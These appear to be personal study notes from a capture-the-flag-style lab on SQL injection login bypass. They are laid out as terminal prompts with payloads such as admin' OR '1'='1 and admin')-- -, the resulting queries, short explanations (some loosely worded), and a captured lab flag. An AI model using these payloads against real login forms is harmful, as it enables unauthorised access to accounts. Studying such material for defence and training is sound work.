AUTHENTICATION BYPASS

root@oco:~$ BROWSER > {targetSite:port}
 username field: admin' OR '1'='1
 password field: unknown
 * SQL: SELECT * FROM logins WHERE username='admin' OR '1'='1 AND password='unknown';
 * as per the diagram, the AND condition is evaluated first
 * since condition 1 is in the DB ('admin') AND the OR '1'='1 condition is always
   true, then the overall statement is TRUE. the password will become unnecessary 
 * the single quote in admin' is used to escape the bounds of the user-input field

root@oco:~$ BROWSER > {targetSite:port}
 username field: tom' OR '1'='1-- 
 password field: ' OR '1'='1
 * SQL: SELECT * FROM logins WHERE username='tom' OR '1'='1--' AND password = '' OR '1'='1';
 * ALT: username field: tom')-- - 
        password field: ' OR '1'='1
         - SQLI: SELECT * FROM logins WHERE (username='tom')-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';

Login successful as user: tom
 * the single quote in tom' is used to escape the bounds of the user-input
 * the query after the comment -- are ignored!
 * in the ALTERNATE version, the single parenthesis will be automatically closed
   by either HTML or the application
 * the 1e54e11980633c7d1fb8a6be99e3e294 is actually the MD5 representation of ' OR '1'='1
 
 * also with the ALTERNATE version, the application ensures that the user's id is always greater than 1 to prevent anyone logging in as admin
 * additionally, it looks like the password field is being hashed before being used in the query.
    - this will prevent the attacker from injecting through the password field because the input is changed to a hash

root@oco:~$ BROWSER > {targetSite:port}
 username field: ' OR '1'='1
 password field: ' OR '1'='1
 * SQL: SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';
 * since the username is unknown, the user present in the first row in the DB will be the one logged in
 * the single quote in ' OR ... is used to escape the bounds of the user-input

root@oco:~$ BROWSER > http://94.237.63.224:40530/
 username field: ' OR 1=1 LIMIT 1-- -'
 * ALT: ' OR 1=1-- -'
 * ALT: ' OR 1=1-- -
    - Anything after the -- -' becomes a comment, also, the single quote after the dash -'
      is just part of the comment; nothing special
  password field: unknown
 * the password field isn't important as it will be ignored by the comment
 * SQL: SELECT * FROM users WHERE username='username' AND password='password';
 * SQLI: SELECT * FROM users WHERE username'' OR 1=1 LIMIT 1-- -' AND password='password';
 * SQLI: SELECT * FROM users WHERE username='' OR 1=1-- AND password='password';

root@oco:~$ BROWSER > {targetSite:port}
 username field: admin'-- -
 password field: ' OR '1'='1
 * if an SQL error is received, it is a good indication that there is a condition applied
   such as id > 1 which prevents ANYONE from logging in as admin
    - use the ALTERNATE BYPASS METHOD IOT comment out the condition statatement
       id > 1

root@oco:~$ BROWSER > {targetSite:port}
 username field: admin')-- -
 password field: ' OR '1'='1
 * SQLI: SELECT * FROM logins WHERE (username='admin')-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';
 
 * in SQL, the comment used in SQLI must be in the form of (-- ) with a space in the end or (-- -) to show the use of a space character
    - these comments will sometimes be URL encoded with the + symbol to represent spaces
    
 * in SQL, parenthesis is used if the application need to check for particular
   condition before others. expressions within the parenthesis take precedence over
   other operators & are evaluated first

root@oco:~$ BROWSER > {targetSite:port}
 username field: ' OR id=5)-- -
 password field: ' OR '1'='1
 * SQL: SELECT * FROM logins WHERE (username='' OR id=5)-- - 
 * SELECT * FROM logins WHERE (username='' OR id=5)-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';
 * Login successful as user: superadmin
    - Here's the flag: cdad9ecdf6f14b45ff5c4de32909caec